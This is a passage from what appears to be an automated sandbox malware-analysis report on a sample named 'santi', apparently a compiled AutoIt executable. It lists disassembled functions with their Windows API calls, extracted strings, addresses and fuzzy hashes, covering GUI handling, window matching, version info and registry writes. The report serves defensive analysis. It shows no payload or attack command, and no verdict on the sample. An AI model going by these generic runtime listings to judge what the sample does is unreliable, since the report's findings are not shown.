                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                • API String ID: 3964851224-45149045
                                                                • Opcode ID: 87e8def36b0ed17e0ea4804b0f9f2e627a3535620f519044813ce13c940ce6b8
                                                                • Instruction ID: 676e4b199101f1a4829476f11e85347fce11164d3e849553ba6c4a6ce8c894b0
                                                                • Opcode Fuzzy Hash: 87e8def36b0ed17e0ea4804b0f9f2e627a3535620f519044813ce13c940ce6b8
                                                                • Instruction Fuzzy Hash: 4DC1A2342142458BCF06EF10C552AAEB7D5AF9A744F024869F9965F3A2DB30FD4BCB42
                                                                Function 0034D575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSysColor.USER32(00000012), ref: 0034D5AE
                                                                • SetTextColor.GDI32(?,?), ref: 0034D5B2
                                                                • GetSysColorBrush.USER32(0000000F), ref: 0034D5C8
                                                                • GetSysColor.USER32(0000000F), ref: 0034D5D3
                                                                • CreateSolidBrush.GDI32(?), ref: 0034D5D8
                                                                • GetSysColor.USER32(00000011), ref: 0034D5F0
                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0034D5FE
                                                                • SelectObject.GDI32(?,00000000), ref: 0034D60F
                                                                • SetBkColor.GDI32(?,00000000), ref: 0034D618
                                                                • SelectObject.GDI32(?,?), ref: 0034D625
                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0034D644
                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0034D65B
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0034D670
                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0034D698
                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0034D6BF
                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 0034D6DD
                                                                • DrawFocusRect.USER32(?,?), ref: 0034D6E8
                                                                • GetSysColor.USER32(00000011), ref: 0034D6F6
                                                                • SetTextColor.GDI32(?,00000000), ref: 0034D6FE
                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0034D712
                                                                • SelectObject.GDI32(?,0034D2A5), ref: 0034D729
                                                                • DeleteObject.GDI32(?), ref: 0034D734
                                                                • SelectObject.GDI32(?,?), ref: 0034D73A
                                                                • DeleteObject.GDI32(?), ref: 0034D73F
                                                                • SetTextColor.GDI32(?,?), ref: 0034D745
                                                                • SetBkColor.GDI32(?,?), ref: 0034D74F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                • String ID:
                                                                • API String ID: 1996641542-0
                                                                • Opcode ID: 1b2a71a933caa807c031d57b04acc8fce322fded48245036a61fc1fa7327b157
                                                                • Instruction ID: 2e400a57d9f67cac21def4ffb846aabfda49e170bec7f10776e7ae064cb42a32
                                                                • Opcode Fuzzy Hash: 1b2a71a933caa807c031d57b04acc8fce322fded48245036a61fc1fa7327b157
                                                                • Instruction Fuzzy Hash: 89513E71E00218AFDF129FA4DC48EAE7BB9EF09324F118515FA15AB2A1D7B59A40CF50
                                                                Function 0034B6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0034B7B0
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0034B7C1
                                                                • CharNextW.USER32(0000014E), ref: 0034B7F0
                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0034B831
                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0034B847
                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0034B858
                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0034B875
                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0034B8C7
                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0034B8DD
                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0034B90E
                                                                • _memset.LIBCMT ref: 0034B933
                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0034B97C
                                                                • _memset.LIBCMT ref: 0034B9DB
                                                                • SendMessageW.USER32 ref: 0034BA05
                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 0034BA5D
                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 0034BB0A
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0034BB2C
                                                                • GetMenuItemInfoW.USER32(?), ref: 0034BB76
                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0034BBA3
                                                                • DrawMenuBar.USER32(?), ref: 0034BBB2
                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0034BBDA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                • String ID: 0
                                                                • API String ID: 1073566785-4108050209
                                                                • Opcode ID: 820e0f3314d9ae63b3dde16c3a24b9cc1090753e64719f31e1b4fcabe71a52e6
                                                                • Instruction ID: 3b6b48a1875bf202a8a0d324399e28de8166b30d69054e73172b86e50d183628
                                                                • Opcode Fuzzy Hash: 820e0f3314d9ae63b3dde16c3a24b9cc1090753e64719f31e1b4fcabe71a52e6
                                                                • Instruction Fuzzy Hash: 93E17C71900218ABDB22DFA5CC84EEEBBBCEF05754F108156F919AE290D770EA41DF60
                                                                Function 002E2EC0 Relevance: 37.1, APIs: 8, Strings: 13, Instructions: 346COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Foreground
                                                                • String ID: ACTIVE$ALL$CLASS$H+9$HANDLE$INSTANCE$L+9$LAST$P+9$REGEXPCLASS$REGEXPTITLE$T+9$TITLE
                                                                • API String ID: 62970417-3468943737
                                                                • Opcode ID: 252eb9073daaa18e9a7ca1eba1cf1125c56aca6a091407ccef87a3215e5b98c4
                                                                • Instruction ID: 9b6eade974920d0b47cd124ebebc0ad6a90c190259e7add6703e74ffafbfcca8
                                                                • Opcode Fuzzy Hash: 252eb9073daaa18e9a7ca1eba1cf1125c56aca6a091407ccef87a3215e5b98c4
                                                                • Instruction Fuzzy Hash: 8FD1E530108646ABCB06EF11C881DABFBB4BF55340F404A29F856575B1DB70E9AECF91
                                                                Function 0034764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCursorPos.USER32(?), ref: 0034778A
                                                                • GetDesktopWindow.USER32 ref: 0034779F
                                                                • GetWindowRect.USER32(00000000), ref: 003477A6
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00347808
                                                                • DestroyWindow.USER32(?), ref: 00347834
                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0034785D
                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0034787B
                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003478A1
                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 003478B6
                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003478C9
                                                                • IsWindowVisible.USER32(?), ref: 003478E9
                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00347904
                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00347918
                                                                • GetWindowRect.USER32(?,?), ref: 00347930
                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00347956
                                                                • GetMonitorInfoW.USER32 ref: 00347970
                                                                • CopyRect.USER32(?,?), ref: 00347987
                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 003479F2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                • String ID: ($0$tooltips_class32
                                                                • API String ID: 698492251-4156429822
                                                                • Opcode ID: df606c9417c6c44e030706e5c56f5bf05521195bc03501fd43b164ce3e450932
                                                                • Instruction ID: cedb23006e73ac3aca95676741b99585567bfe1eaf86de942d4ef7021305a7fc
                                                                • Opcode Fuzzy Hash: df606c9417c6c44e030706e5c56f5bf05521195bc03501fd43b164ce3e450932
                                                                • Instruction Fuzzy Hash: 0EB1AD71618340AFDB05DF65C989B6ABBE9FF88310F40891DF5999B291DB70EC04CB92
                                                                Function 00326CE9 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00326CFB
                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00326D21
                                                                • _wcscpy.LIBCMT ref: 00326D4F
                                                                • _wcscmp.LIBCMT ref: 00326D5A
                                                                • _wcscat.LIBCMT ref: 00326D70
                                                                • _wcsstr.LIBCMT ref: 00326D7B
                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00326D97
                                                                • _wcscat.LIBCMT ref: 00326DE0
                                                                • _wcscat.LIBCMT ref: 00326DE7
                                                                • _wcsncpy.LIBCMT ref: 00326E12
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                • API String ID: 699586101-1459072770
                                                                • Opcode ID: dc662f48312d2ec399d55885d4c8f3b37c79b8c305bff8ed86924a43fbc89cd7
                                                                • Instruction ID: 8ecfa5a55b1caa775414e7d620a7d3156a7b775975d6add15d7db9abe0e65d0d
                                                                • Opcode Fuzzy Hash: dc662f48312d2ec399d55885d4c8f3b37c79b8c305bff8ed86924a43fbc89cd7
                                                                • Instruction Fuzzy Hash: 5E413472A01215BBEB07AB64DD47EBF77BCEF41310F140069F901AA1C2EB749A0196A2
                                                                Function 002FA856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002FA939
                                                                • GetSystemMetrics.USER32(00000007), ref: 002FA941
                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 002FA96C
                                                                • GetSystemMetrics.USER32(00000008), ref: 002FA974
                                                                • GetSystemMetrics.USER32(00000004), ref: 002FA999
                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 002FA9B6
                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 002FA9C6
                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 002FA9F9
                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 002FAA0D
                                                                • GetClientRect.USER32(00000000,000000FF), ref: 002FAA2B
                                                                • GetStockObject.GDI32(00000011), ref: 002FAA47
                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 002FAA52
                                                                  • Part of subcall function 002FB63C: GetCursorPos.USER32(000000FF), ref: 002FB64F
                                                                  • Part of subcall function 002FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 002FB66C
                                                                  • Part of subcall function 002FB63C: GetAsyncKeyState.USER32(00000001), ref: 002FB691
                                                                  • Part of subcall function 002FB63C: GetAsyncKeyState.USER32(00000002), ref: 002FB69F
                                                                • SetTimer.USER32(00000000,00000000,00000028,002FAB87), ref: 002FAA79
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                • String ID: AutoIt v3 GUI
                                                                • API String ID: 1458621304-248962490
                                                                • Opcode ID: ae3be249b7cd00b60c89b94735675ac7582ddbbeb35526c350620d74542d732b
                                                                • Instruction ID: 3feeadc805357da26fe97555b1f8fa75384383cf36d6fb1edfa2a55f98f2d424
                                                                • Opcode Fuzzy Hash: ae3be249b7cd00b60c89b94735675ac7582ddbbeb35526c350620d74542d732b
                                                                • Instruction Fuzzy Hash: 41B19071A1020A9FDB15DFA8CC45BAEBBB8FB08355F154129FA15E72A0DBB0D850CF51
                                                                Function 00343639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00343735
                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0037DC00,00000000,?,00000000,?,?), ref: 003437A3
                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003437EB
                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00343874
                                                                • RegCloseKey.ADVAPI32(?), ref: 00343B94
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00343BA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                • API String ID: 536824911-966354055
                                                                • Opcode ID: 484e7f077ef3569b6cd70565c6b76d25bc60c42e71a165e662670ab4355914d9
                                                                • Instruction ID: d25cc184192006cac1d2a9534ff7971b7edfb63e2b6a64d2a42f7d2b6f4f8fef
                                                                • Opcode Fuzzy Hash: 484e7f077ef3569b6cd70565c6b76d25bc60c42e71a165e662670ab4355914d9
                                                                • Instruction Fuzzy Hash: BB0277752046019FCB15EF25C891A2AB7E9FF88720F05845DF98A9B3A2CB30ED51CF81
                                                                Function 00346BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?), ref: 00346C56
                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00346D16
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharMessageSendUpper
                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                • API String ID: 3974292440-719923060
                                                                • Opcode ID: 3c750173cc9d7870eac1ff12fd0909a7532f65f556dacdbf1a87f18d504ecc2b
                                                                • Instruction ID: 740d2e9277fa85509d16586a45bc42e060908266ea6b5167aa25ce3122e3dade
                                                                • Opcode Fuzzy Hash: 3c750173cc9d7870eac1ff12fd0909a7532f65f556dacdbf1a87f18d504ecc2b
                                                                • Instruction Fuzzy Hash: 91A1AD342142459BCB16EF20C952A7AB3E5BF86354F11486DB9969F3D2DB30FC1ACB42
                                                                Function 0031CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0031CF91
                                                                • __swprintf.LIBCMT ref: 0031D032
                                                                • _wcscmp.LIBCMT ref: 0031D045
                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0031D09A
                                                                • _wcscmp.LIBCMT ref: 0031D0D6
                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0031D10D
                                                                • GetDlgCtrlID.USER32(?), ref: 0031D15F
                                                                • GetWindowRect.USER32(?,?), ref: 0031D195
                                                                • GetParent.USER32(?), ref: 0031D1B3
                                                                • ScreenToClient.USER32(00000000), ref: 0031D1BA
                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0031D234
                                                                • _wcscmp.LIBCMT ref: 0031D248
                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0031D26E
                                                                • _wcscmp.LIBCMT ref: 0031D282
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                • String ID: %s%u
                                                                • API String ID: 3119225716-679674701
                                                                • Opcode ID: d306841b3d70b9a0201de7a2d5f2a0ae82db70b8cf21e325312e558610ef50da
                                                                • Instruction ID: 36a657b0527c0221c4af6e5be648a8d41489120e2c5ba8b5a98e8f10d1755bf3
                                                                • Opcode Fuzzy Hash: d306841b3d70b9a0201de7a2d5f2a0ae82db70b8cf21e325312e558610ef50da
                                                                • Instruction Fuzzy Hash: 53A1D231604306AFD71ADF64C884FEAB7A8FF49354F008929F969D6190D730EA96CB91
                                                                Function 0031D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0031D8EB
                                                                • _wcscmp.LIBCMT ref: 0031D8FC
                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0031D924
                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0031D941
                                                                • _wcscmp.LIBCMT ref: 0031D95F
                                                                • _wcsstr.LIBCMT ref: 0031D970
                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0031D9A8
                                                                • _wcscmp.LIBCMT ref: 0031D9B8
                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0031D9DF
                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0031DA28
                                                                • _wcscmp.LIBCMT ref: 0031DA38
                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0031DA60
                                                                • GetWindowRect.USER32(00000004,?), ref: 0031DAC9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                • String ID: @$ThumbnailClass
                                                                • API String ID: 1788623398-1539354611
                                                                • Opcode ID: c38d3fc18315bb9aacc8e142a366a589edcc0f23c5e458f6a553d9c949e1df92
                                                                • Instruction ID: 54dd65f03c951f515179a4411190745658a40040bdc753f86c7547ec731b2dae
                                                                • Opcode Fuzzy Hash: c38d3fc18315bb9aacc8e142a366a589edcc0f23c5e458f6a553d9c949e1df92
                                                                • Instruction Fuzzy Hash: 6D81D5311083459BDB0ACF10C885FEA7BE8FF49314F058469FD8A9A095DB70ED85CBA1
                                                                Function 0031D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __wcsnicmp
                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                • API String ID: 1038674560-1810252412
                                                                • Opcode ID: 73eb759042277967c15d147509065fb264dcde93ab3e86464de33f92d6ddd36c
                                                                • Instruction ID: e416748036da673d601eed769a10cb699f50ac27135be190d851b31246eda9f1
                                                                • Opcode Fuzzy Hash: 73eb759042277967c15d147509065fb264dcde93ab3e86464de33f92d6ddd36c
                                                                • Instruction Fuzzy Hash: 1B31DE31A88745BADF1AFF51DD53EEEB3A89F25744F600028F401B50D1EB61AF54CA91
                                                                Function 0031EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadIconW.USER32(00000063), ref: 0031EAB0
                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0031EAC2
                                                                • SetWindowTextW.USER32(?,?), ref: 0031EAD9
                                                                • GetDlgItem.USER32(?,000003EA), ref: 0031EAEE
